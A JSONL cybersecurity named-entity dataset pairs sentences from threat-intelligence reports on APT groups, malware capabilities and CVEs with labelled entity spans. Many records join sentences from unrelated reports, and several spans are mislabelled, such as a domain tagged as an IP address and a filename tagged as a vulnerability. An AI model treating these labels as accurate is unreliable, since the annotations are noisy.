{"text": "We were able to discover this particular version by diving further into connections to analytics-google.org .", "spans": {"IP_ADDRESS: analytics-google.org": [[87, 107]]}, "info": {"id": "cyberner_stix_train_001191", "source": "cyberner_stix_train"}}
{"text": "The opcode instructions generated by this custom VM are divided into different categories : Logical opcodes , which implement bit-logic operators ( OR , AND , NOT , XOR ) and mathematical operators Conditional branching opcodes , which implement a code branch based on conditions ( equals to JC , JE , JZ , other similar branching opcodes ) Load/Store opcodes , which write to or read from particular addresses of the virtual address space of the process Specialized opcodes for various purposes , Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years . However , there is a downside of using such a technique : once the scheme is uncovered , the attacker loses control and computers can be cleaned through regular updates . What ’s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": {"TOOL: Emissary": [[549, 557]], "THREAT_ACTOR: threat actors": [[597, 610]], "TOOL: MOVEit": [[908, 914]]}, "info": {"id": "cyberner_stix_train_001192", "source": "cyberner_stix_train"}}
{"text": "Next , the loader checks that it ’ s not running in a virtualized environment ( VMWare or Hyper-V ) or under a debugger . Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors . ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Malware/Backdoor 659 KB ( 674 , 816 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 . Getting access to the C2 information helped the researchers get a clear view of the attacker 's operations and utilities .", "spans": {"SYSTEM: VMWare": [[80, 86]], "SYSTEM: Hyper-V": [[90, 97]], "THREAT_ACTOR: APT32": [[150, 155]], "ORGANIZATION: network security": [[169, 185]], "ORGANIZATION: technology infrastructure corporations": [[190, 228]], "FILEPATH: ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4": [[269, 333]], "SYSTEM: Windows": [[401, 408]], "TOOL: DLL": [[411, 414]], "ORGANIZATION: Intel": [[429, 434]], "SYSTEM: C2": [[487, 489]]}, "info": {"id": "cyberner_stix_train_001193", "source": "cyberner_stix_train"}}
{"text": "The threat actor Rocke was originally revealed by Talos in August of 2018 and many remarkable behaviors were disclosed in their blog post . Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft .", "spans": {"ORGANIZATION: Talos": [[50, 55]], "ORGANIZATION: Apple": [[229, 234]], "ORGANIZATION: Facebook": [[237, 245]], "ORGANIZATION: Twitter": [[248, 255]], "ORGANIZATION: Microsoft": [[260, 269]]}, "info": {"id": "cyberner_stix_train_001195", "source": "cyberner_stix_train"}}
{"text": "Secureworks Counter Threat Unit ( CTU ) researchers have observed BRONZE PRESIDENT activity since mid-2018 but identified artifacts suggesting that the threat actors may have been conducting network intrusions as far back as 2014 .", "spans": {"ORGANIZATION: Secureworks Counter Threat Unit": [[0, 31]], "ORGANIZATION: CTU": [[34, 37]], "THREAT_ACTOR: BRONZE PRESIDENT": [[66, 82]]}, "info": {"id": "cyberner_stix_train_001196", "source": "cyberner_stix_train"}}
{"text": "The original app looks innocent , with most of its code aimed at implementing the real features that the app claims to provide . Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests . Word Dropper Variant cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 7ce3d9fc86396fac9865607594395e94 Word Dropper Variant 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 74c7aed44680100e984251ce2cdbdbc6 Word Dropper Variant facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 10f308d78adda567d4589803ce18cc9b Word Dropper Variant e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 f279d0f04874327b85221697d99de321 Word Dropper Variant 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d bc1b322e7efc19417ab0d0524ccb9ff2 . Mandiant has observed overlap amongst multiple North Korean groups that fall under the RGB .", "spans": {"THREAT_ACTOR: operators": [[271, 280]], "ORGANIZATION: FireEye": [[283, 290]], "THREAT_ACTOR: APT32": [[305, 310]], "THREAT_ACTOR: cyber espionage group": [[316, 337]], "MALWARE: Word Dropper": [[385, 397], [504, 516], [623, 635], [742, 754], [861, 873]], "FILEPATH: cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36": [[406, 470]], "FILEPATH: 7ce3d9fc86396fac9865607594395e94": [[471, 503]], "FILEPATH: 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28": [[525, 589]], "FILEPATH: 74c7aed44680100e984251ce2cdbdbc6": [[590, 622]], "FILEPATH: facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3": [[644, 708]], "FILEPATH: 10f308d78adda567d4589803ce18cc9b": [[709, 741]], "FILEPATH: e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11": [[763, 827]], "FILEPATH: f279d0f04874327b85221697d99de321": [[828, 860]], "FILEPATH: 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d": [[882, 946]], "FILEPATH: bc1b322e7efc19417ab0d0524ccb9ff2": [[947, 979]]}, "info": {"id": "cyberner_stix_train_001197", "source": "cyberner_stix_train"}}
{"text": "Yet our statistics says that about 60 % of Android users are still sitting with Android 4.4.2 and below . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": {"SYSTEM: Android": [[43, 50]], "SYSTEM: Android 4.4.2 and below": [[80, 103]], "ORGANIZATION: Symantec": [[155, 163]], "VULNERABILITY: (CVE-2019-0703)": [[164, 179]], "FILEPATH: .rtf file": [[295, 304]], "VULNERABILITY: CVE-2017-0199": [[320, 333]]}, "info": {"id": "cyberner_stix_train_001198", "source": "cyberner_stix_train"}}
{"text": "C&C : The command and control channel that serves to relay commands between the installed malware and attackers .", "spans": {"TOOL: C&C": [[0, 3]], "TOOL: command and control": [[10, 29]]}, "info": {"id": "cyberner_stix_train_001199", "source": "cyberner_stix_train"}}
{"text": "In some samples , starting from January 2016 , an algorithm has been implemented for unpacking the encrypted executable DEX file from the assets folder . Some of the documents exploited CVE-2017-0199 to deliver the payload . Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs .", "spans": {"MALWARE: documents": [[166, 175]], "VULNERABILITY: CVE-2017-0199": [[186, 199]], "ORGANIZATION: Trend Micro": [[225, 236]], "ORGANIZATION: Trend Micro™ Smart Protection Suites": [[264, 300]], "ORGANIZATION: Worry-Free™ Business Security": [[305, 334]], "ORGANIZATION: businesses": [[357, 367]], "FILEPATH: malicious files": [[400, 415]]}, "info": {"id": "cyberner_stix_train_001200", "source": "cyberner_stix_train"}}
{"text": "Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits .", "spans": {"THREAT_ACTOR: BARIUM": [[5, 11]], "TOOL: malicious shortcut": [[142, 160]], "FILEPATH: .lnk": [[163, 167]], "TOOL: compiled HTML": [[199, 212]], "FILEPATH: .chm": [[220, 224]], "TOOL: Microsoft Office documents": [[238, 264]]}, "info": {"id": "cyberner_stix_train_001201", "source": "cyberner_stix_train"}}
{"text": "The Lookout Threat Intelligence team identified that this same Facebook profile has also posted Google Drive links to Android malware belonging to the FrozenCell family attributed to APT-C-27 . This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) . In this case, the Trustwave Secure email Gateway flagged the message as suspicious and it did not get . Based on our research , we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[4, 31]], "ORGANIZATION: Facebook": [[63, 71]], "SYSTEM: Google Drive": [[96, 108]], "SYSTEM: Android": [[118, 125]], "MALWARE: FrozenCell": [[151, 161]], "THREAT_ACTOR: Lazarus": [[294, 301]], "TOOL: email": [[432, 437]], "ORGANIZATION: individuals and smaller companies": [[623, 656]]}, "info": {"id": "cyberner_stix_train_001202", "source": "cyberner_stix_train"}}
{"text": "The second function is http : //s.psserviceonline [ . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[54, 67]], "VULNERABILITY: zero-day vulnerability": [[123, 145]], "MALWARE: Powermud backdoor": [[334, 351]], "MALWARE: Backdoor.Powemuddy": [[371, 389]], "MALWARE: custom tools": [[398, 410]], "SYSTEM: Windows": [[511, 518]], "FILEPATH: makecab.exe": [[543, 554]]}, "info": {"id": "cyberner_stix_train_001203", "source": "cyberner_stix_train"}}
{"text": "These accounts are created by abusing accessibility services . By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks . Foreword ” . In March 2021 , in a separate environment , we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server .", "spans": {"ORGANIZATION: Group-IB": [[104, 112]], "THREAT_ACTOR: MoneyTaker group": [[129, 145]], "ORGANIZATION: bank": [[217, 221]], "SYSTEM: a separate environment": [[301, 323]], "THREAT_ACTOR: a threat actor": [[338, 352]], "VULNERABILITY: the vulnerable Exchange Server": [[424, 454]]}, "info": {"id": "cyberner_stix_train_001204", "source": "cyberner_stix_train"}}
{"text": "Get installed applications GET_CONTACTS Get contacts SEND_BULK_SMS Send SMS to multiple numbers UPDATE_APK Not implemented INJECT_PACKAGE Add new overlay target CALL_FORWARD Enable/disable call forwarding START_PERMISSIONS Starts request for additional permissions ( Accessibility privileges , battery optimizations bypass , dynamic permissions ) Features The most recent version of Ginp has the same capabilities as most other Android banking Trojans , such as the use of overlay attacks , SMS control and contact In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . Symantec reported that Tick exploited additional Adobe Flash and Microsoft Office vulnerabilities .", "spans": {"SYSTEM: Android": [[428, 435]], "THREAT_ACTOR: APT10": [[540, 545]], "TOOL: Citrix": [[595, 601]], "TOOL: LogMeIn": [[606, 613]], "ORGANIZATION: Symantec": [[675, 683]], "THREAT_ACTOR: Tick": [[698, 702]], "TOOL: Adobe Flash": [[724, 735]], "TOOL: Microsoft Office": [[740, 756]], "VULNERABILITY: vulnerabilities": [[757, 772]]}, "info": {"id": "cyberner_stix_train_001205", "source": "cyberner_stix_train"}}
{"text": "Once installed on a device FrozenCell is capable of : Recording calls Retrieving generic phone metadata ( e.g. , cell location , mobile country code , mobile network code ) Geolocating a device Extracting SMS messages Retrieving a victim 's accounts Exfiltrating images Downloading and installing additional applications Searching for and exfiltrating pdf , doc , docx , ppt , pptx , xls , and xlsx file types Retrieving contacts The graph below represents a split of the types of data The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem . APT1 . Threat actors have been using this business model for a decade - plus , originally known as commodity malware .", "spans": {"MALWARE: FrozenCell": [[27, 37]], "TOOL: GozNym": [[526, 532]], "ORGANIZATION: Kessem": [[674, 680]], "THREAT_ACTOR: APT1": [[683, 687]], "THREAT_ACTOR: Threat actors": [[690, 703]], "MALWARE: commodity malware": [[782, 799]]}, "info": {"id": "cyberner_stix_train_001206", "source": "cyberner_stix_train"}}
{"text": "Busybox payload Busybox is public software that provides several Linux tools in a single ELF file . The attackers have targeted a large number of organizations globally since early 2017 . Heightened activity was seen in mid-2015 .", "spans": {"THREAT_ACTOR: attackers": [[104, 113]]}, "info": {"id": "cyberner_stix_train_001207", "source": "cyberner_stix_train"}}
{"text": "However , in addition to the traditional functionality , there were also backdoor capabilities such as upload , download , delete files , camera takeover and record surrounding audio . A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild . When uploading stolen data to a cloud service , it uses predefined directory path such as /english , /video or /scriptout .", "spans": {"ORGANIZATION: Talos": [[240, 245]]}, "info": {"id": "cyberner_stix_train_001208", "source": "cyberner_stix_train"}}
{"text": "CN Tel . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola .", "spans": {"THREAT_ACTOR: APT20": [[45, 50]], "VULNERABILITY: zero-day exploits": [[59, 76]], "THREAT_ACTOR: BlackOasis": [[147, 157]]}, "info": {"id": "cyberner_stix_train_001209", "source": "cyberner_stix_train"}}
{"text": "Comparison of code of Asset file before and after decryption Figure 11 . APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets . The image file has been correctly identified by SEG as a PNG when its file extension is .jpg denoting a JPEG formatted . None on the CrowdStrike Falcon ® console and of the market - leading CrowdStrike Falcon ® platform in action .", "spans": {"THREAT_ACTOR: APT15": [[73, 78]], "TOOL: Mimikatz": [[103, 111]], "FILEPATH: .jpg": [[259, 263]], "TOOL: CrowdStrike Falcon": [[304, 322], [361, 379]]}, "info": {"id": "cyberner_stix_train_001210", "source": "cyberner_stix_train"}}
{"text": "Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests .", "spans": {"THREAT_ACTOR: they": [[39, 43]], "TOOL: actor-controlled": [[110, 126]], "TOOL: servers": [[127, 134]], "MALWARE: router": [[153, 159]]}, "info": {"id": "cyberner_stix_train_001211", "source": "cyberner_stix_train"}}
{"text": "Possible impacts include : temporary or permanent loss of sensitive or proprietary information , disruption to regular operations , financial losses incurred to restore systems and files , and potential harm to an organization 's reputation .", "spans": {}, "info": {"id": "cyberner_stix_train_001212", "source": "cyberner_stix_train"}}
{"text": "We confirmed that the tool did not expose vulnerabilities in the management technology itself , but rather misused AMT SOL within target networks that have already been compromised to keep communication stealthy and evade security applications . From late April to early May , the attackers focused on human rights related NGOs .", "spans": {"ORGANIZATION: NGOs": [[323, 327]]}, "info": {"id": "cyberner_stix_train_001213", "source": "cyberner_stix_train"}}
{"text": "Conclusion Smishing ( SMS phishing ) offers a unique vector to infect mobile users . Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks . The decoded base64 data is an AutoIT binary . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"THREAT_ACTOR: OilRig group": [[148, 160]], "TOOL: credential harvesting": [[171, 192]], "TOOL: compromised accounts": [[197, 217]], "ORGANIZATION: government agency": [[229, 246]], "TOOL: AutoIT": [[326, 332]], "TOOL: Outlook Web Application ( OWA ) endpoint": [[423, 463]], "TOOL: Exchange": [[521, 529]]}, "info": {"id": "cyberner_stix_train_001214", "source": "cyberner_stix_train"}}
{"text": "TA459 is well-known for targeting organizations in Russia and neighboring countries .", "spans": {"THREAT_ACTOR: TA459": [[0, 5]]}, "info": {"id": "cyberner_stix_train_001215", "source": "cyberner_stix_train"}}
{"text": "The spear-phishing emails used by the Dukes may contain either specially-crafted malicious attachments or links to URLs hosting the malware .", "spans": {"TOOL: emails": [[19, 25]], "THREAT_ACTOR: Dukes": [[38, 43]]}, "info": {"id": "cyberner_stix_train_001216", "source": "cyberner_stix_train"}}
{"text": "The app then clicks the appropriate buttons , scrollbars , and other UI elements to go through account sign-up without user intervention . At this point , the current attack campaign against the chemical industry began . FireEye Threat Intelligence assesses that APT17 , a China based threat group , was behind the attempt . The track controlling commands issued may have also resulted in tram collisions , a further risk to those on board and nearby the areas of impact .", "spans": {"ORGANIZATION: chemical industry": [[195, 212]], "ORGANIZATION: FireEye": [[221, 228]], "THREAT_ACTOR: APT17": [[263, 268]]}, "info": {"id": "cyberner_stix_train_001217", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT has deployed a variety of remote access tools .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]]}, "info": {"id": "cyberner_stix_train_001218", "source": "cyberner_stix_train"}}
{"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . Just like last time , Buhtrap is spreading through exploits embedded in news outlets .", "spans": {"MALWARE: bot": [[5, 8]], "ORGANIZATION: news outlets": [[221, 233]]}, "info": {"id": "cyberner_stix_train_001219", "source": "cyberner_stix_train"}}
{"text": "It then sends the aggregated log back to the C2 server .", "spans": {"TOOL: C2": [[45, 47]]}, "info": {"id": "cyberner_stix_train_001220", "source": "cyberner_stix_train"}}
{"text": "EVENTBOT VERSION 0.3.0.1 Additional Assets Based on Country / Region EventBot-23aEventBot Spanish and Italian Images in Spanish and Italian added in version 0.3.0.1 . We assume that RunPow stands for run PowerShell , ” and triggers the PowerShell code embedded inside the .dll file . Once connected to the VPN , APT35 focused on stealing domain credentials from a Microsoft Active Directory Domain Controller to allow them to authenticate to the single-factor VPN and Office 365 instance .", "spans": {"MALWARE: PowerShell": [[204, 214]], "MALWARE: .dll file": [[272, 281]], "TOOL: VPN": [[306, 309], [460, 463]], "THREAT_ACTOR: APT35": [[312, 317]], "ORGANIZATION: Microsoft": [[364, 373]]}, "info": {"id": "cyberner_stix_train_001221", "source": "cyberner_stix_train"}}
{"text": "There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command .", "spans": {"TOOL: PowerShell": [[122, 132]]}, "info": {"id": "cyberner_stix_train_001222", "source": "cyberner_stix_train"}}
{"text": "The latest version is analyzed here ; we weren ’ t able to determine if the earlier versions were also malicious . During this attack , we found that the SLUB malware used two Slack teams sales-yww9809” and marketing-pwx7789 . The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine .", "spans": {"THREAT_ACTOR: SLUB": [[154, 158]], "MALWARE: wipers": [[269, 275]]}, "info": {"id": "cyberner_stix_train_001223", "source": "cyberner_stix_train"}}
{"text": "] 31 162.243.172 [ . In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON . In our analysis , we reviewed the TTPs and the decoy content , and pointed out the similarities between previous attacks that have been attributed to MoleRATs , an Arabic-speaking , politically motivated group that has operated The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname “ PIG GOD”—another", "spans": {"THREAT_ACTOR: TEMP.Veles": [[59, 69], [148, 158]], "ORGANIZATION: FireEye": [[72, 79]], "TOOL: TRITON": [[181, 187]], "THREAT_ACTOR: MoleRATs": [[340, 348]], "ORGANIZATION: “ PIG GOD”—another": [[518, 536]]}, "info": {"id": "cyberner_stix_train_001224", "source": "cyberner_stix_train"}}
{"text": "However , we did find a single shared IP address demonstrably connecting the Downeks downloader and Quasar C2 infrastructure .", "spans": {"MALWARE: Downeks": [[77, 84]], "MALWARE: Quasar": [[100, 106]], "TOOL: C2": [[107, 109]]}, "info": {"id": "cyberner_stix_train_001225", "source": "cyberner_stix_train"}}
{"text": "Kaspersky products detect the above-described threat with the verdict Trojan-Banker.AndroidOS.Riltok . Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia . An interesting element is that the malware looks for filenames created with the previous version of KONNI .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "ORGANIZATION: Trend Micro": [[103, 114]], "THREAT_ACTOR: BlackTech": [[190, 199]], "MALWARE: KONNI": [[355, 360]]}, "info": {"id": "cyberner_stix_train_001226", "source": "cyberner_stix_train"}}
{"text": "It has similar functionality to the ‘ AndroidMDMSupport ’ command from the current versions – stealing data belonging to other installed applications . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . Winnti Group is a threat group with Chinese origins that has been active since at least 2010 .", "spans": {"THREAT_ACTOR: Operation Parliament": [[152, 172]], "THREAT_ACTOR: Winnti Group": [[254, 266]]}, "info": {"id": "cyberner_stix_train_001227", "source": "cyberner_stix_train"}}
{"text": "Upon conclusion of our investigation , we shared this information with the manufacturers of the specific devices involved and they have used this event to explore new protections in their products .", "spans": {}, "info": {"id": "cyberner_stix_train_001228", "source": "cyberner_stix_train"}}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . Xagent” is the original filename Xagent.exe whereas seems to be the version of the worm .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "FILEPATH: Xagent”": [[89, 96]], "FILEPATH: Xagent.exe": [[122, 132]], "FILEPATH: worm": [[172, 176]]}, "info": {"id": "cyberner_stix_train_001229", "source": "cyberner_stix_train"}}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "ORGANIZATION: military officials": [[63, 81]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]], "VULNERABILITY: CVE-2014-0515": [[271, 284]], "TOOL: Adobe Flash": [[285, 296]], "VULNERABILITY: exploit": [[297, 304]], "ORGANIZATION: Cisco TRAC": [[323, 333]]}, "info": {"id": "cyberner_stix_train_001230", "source": "cyberner_stix_train"}}
{"text": "The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": {"MALWARE: Hancitor": [[149, 157]], "MALWARE: Epic Turla": [[181, 191]], "ORGANIZATION: embassies": [[270, 279]]}, "info": {"id": "cyberner_stix_train_001231", "source": "cyberner_stix_train"}}
{"text": "While recent Zebrocy versioning was 7.1 , some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0 .", "spans": {"MALWARE: Zebrocy": [[13, 20], [62, 69]], "TOOL: MSIL": [[102, 106]], "TOOL: Covfacy": [[123, 130]]}, "info": {"id": "cyberner_stix_train_001232", "source": "cyberner_stix_train"}}
{"text": "Triada : organized crime on Android 2 . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": {"MALWARE: Triada": [[0, 6]], "SYSTEM: Android": [[28, 35]], "VULNERABILITY: CVE-2017-0143": [[40, 53]], "MALWARE: tools—EternalRomance": [[89, 109]], "MALWARE: EternalSynergy—that": [[114, 133]], "THREAT_ACTOR: APT34": [[225, 230]], "TOOL: Microsoft Office": [[252, 268]], "VULNERABILITY: CVE-2017-11882": [[283, 297]], "MALWARE: POWRUNER": [[308, 316]], "MALWARE: BONDUPDATER": [[321, 332]]}, "info": {"id": "cyberner_stix_train_001233", "source": "cyberner_stix_train"}}
{"text": "] 144 [ . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea . In the case of old Windows versions like XP , main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": {"THREAT_ACTOR: APT37": [[10, 15]], "SYSTEM: Windows": [[161, 168]], "SYSTEM: XP": [[183, 185]], "FILEPATH: events.exe": [[200, 210]], "FILEPATH: XPTask.vbs": [[226, 236]], "ORGANIZATION: Microsoft": [[237, 246]]}, "info": {"id": "cyberner_stix_train_001234", "source": "cyberner_stix_train"}}
{"text": "Exfiltrate Chrome browser history ( limited to a given date ) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 reqcalllog.php Commands not yet In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” . This malware is responsible for stealing Bluetooth device information .", "spans": {"MALWARE: BMW_x1”": [[584, 591]], "MALWARE: BMW_x2”": [[594, 601]], "MALWARE: BMW_x8”": [[612, 619]], "TOOL: Bluetooth": [[663, 672]]}, "info": {"id": "cyberner_stix_train_001235", "source": "cyberner_stix_train"}}
{"text": "In October 2017 , AhnLab published a report called \" Operation Bitter Biscuit \" , an attack campaign against South Korea , Japan , India and Russia using Bisonal and its successors , Bioazih and Dexbia . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": {"ORGANIZATION: AhnLab": [[18, 24]], "TOOL: Bisonal": [[154, 161]], "TOOL: Bioazih": [[183, 190]], "TOOL: Dexbia": [[195, 201]], "MALWARE: Carbanak": [[232, 240]], "ORGANIZATION: banks": [[274, 279]]}, "info": {"id": "cyberner_stix_train_001236", "source": "cyberner_stix_train"}}
{"text": "At this time , we do not believe that the attackers found a new ASA exploit . However , in the same week of September a series of spearphishing attempts once again targeted a set of otherwise unrelated individuals , employing the same tactics as before .", "spans": {"ORGANIZATION: we": [[15, 17]], "THREAT_ACTOR: attackers": [[42, 51]], "VULNERABILITY: ASA": [[64, 67]], "VULNERABILITY: exploit": [[68, 75]]}, "info": {"id": "cyberner_stix_train_001237", "source": "cyberner_stix_train"}}
{"text": "To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"TOOL: Atmosphere": [[58, 68]], "THREAT_ACTOR: Silence": [[93, 100]], "MALWARE: xfs-disp.exe": [[166, 178]], "ORGANIZATION: Bank": [[233, 237]], "THREAT_ACTOR: attackers": [[244, 253]], "TOOL: emails": [[268, 274]], "FILEPATH: XLS files": [[300, 309]], "ORGANIZATION: employees working in the banking sector": [[313, 352]]}, "info": {"id": "cyberner_stix_train_001238", "source": "cyberner_stix_train"}}
{"text": "The simpler one will connect to a hardcoded C&C server over HTTP or HTTPS to download commands to execute .", "spans": {"TOOL: C&C": [[44, 47]]}, "info": {"id": "cyberner_stix_train_001239", "source": "cyberner_stix_train"}}
{"text": "We identified infrastructure overlaps and string references to previous Wolf Research work . According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 . In addition , the IXESHE attackers conducted two specific attacks that leveraged zero-day exploits—one in 2009 and another in 2011 . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": {"ORGANIZATION: Wolf Research": [[72, 85]], "TOOL: Winnti family of malware": [[148, 172]], "THREAT_ACTOR: IXESHE": [[304, 310]], "VULNERABILITY: zero-day": [[367, 375]], "VULNERABILITY: the complexity of managing CSP rules": [[434, 470]], "VULNERABILITY: vulnerability": [[478, 491]], "SYSTEM: Google Analytics": [[531, 547]]}, "info": {"id": "cyberner_stix_train_001240", "source": "cyberner_stix_train"}}
{"text": "Use of the virtual machine brings many technical benefits to the operators , chief among them allowing the malware to install apps without requiring users to approve a list of elevated permissions . DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server . The malware also features a destructive component , which can wipe the master boot record of an infected computer . Beyond Ukraine , the group continues to sustain espionage operations that are global in scope and illustrative of the Russian military 's far - reaching ambitions and interests in other regions .", "spans": {"TOOL: DDoS malware": [[199, 211]], "THREAT_ACTOR: espionage operations": [[515, 535]]}, "info": {"id": "cyberner_stix_train_001241", "source": "cyberner_stix_train"}}
{"text": "After investigation , QiAnXin suspect this attack is carried out by Molerats . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) .", "spans": {"ORGANIZATION: QiAnXin": [[22, 29]], "THREAT_ACTOR: Molerats": [[68, 76]], "TOOL: Word": [[93, 97]], "FILEPATH: Bienvenue_a_Sahaja_Yoga_Toulouse.doc": [[133, 169]], "FILEPATH: Update.exe": [[201, 211]], "TOOL: DLL": [[218, 221]], "FILEPATH: McUpdate.dll": [[224, 236]]}, "info": {"id": "cyberner_stix_train_001242", "source": "cyberner_stix_train"}}
{"text": "PinchDuke will also search for files that have been created within a predefined timeframe and whose file extension is present in a predefined list .", "spans": {"MALWARE: PinchDuke": [[0, 9]]}, "info": {"id": "cyberner_stix_train_001243", "source": "cyberner_stix_train"}}
